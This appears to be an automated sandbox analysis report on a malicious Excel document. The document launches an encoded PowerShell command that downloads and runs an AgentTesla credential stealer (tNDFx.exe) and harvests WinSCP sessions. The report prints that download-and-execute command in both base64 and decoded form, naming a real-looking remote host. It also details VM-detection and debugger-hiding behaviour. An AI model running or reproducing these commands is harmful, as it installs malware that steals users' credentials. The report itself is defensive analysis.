                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWindow / User API: threadDelayed 9628Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 3044Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484Thread sleep count: 9628 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1484Thread sleep count: 70 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exe TID: 1776Thread sleep count: 126 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: tNDFx.exe, 00000006.00000002.2134184751.00000000058E8000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Contains functionality to hide a thread from the debuggerShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeCode function: 6_2_001E9FDC NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,001EA6BF,00000000,000000006_2_001E9FDC
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Yara detected Powershell download and executeShow sources
                      Source: Yara matchFile source: 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1320, type: MEMORY
                      Encrypted powershell cmdline option foundShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded (New-Object Net.WebClient).DownloadFile('http://specfloors.net/dev/income.exe',($env:appdata)+'\tNDFx.exe');Start-Sleep 2; Start-Process $env:appdata\tNDFx.exeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeMemory written: C:\Users\user\AppData\Roaming\tNDFx.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUAJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe 'C:\Users\user\AppData\Roaming\tNDFx.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeProcess created: C:\Users\user\AppData\Roaming\tNDFx.exe C:\Users\user\AppData\Roaming\tNDFx.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUAJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUAJump to behavior
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: tNDFx.exe, 0000000B.00000002.2351497719.0000000000C20000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Users\user\AppData\Roaming\tNDFx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
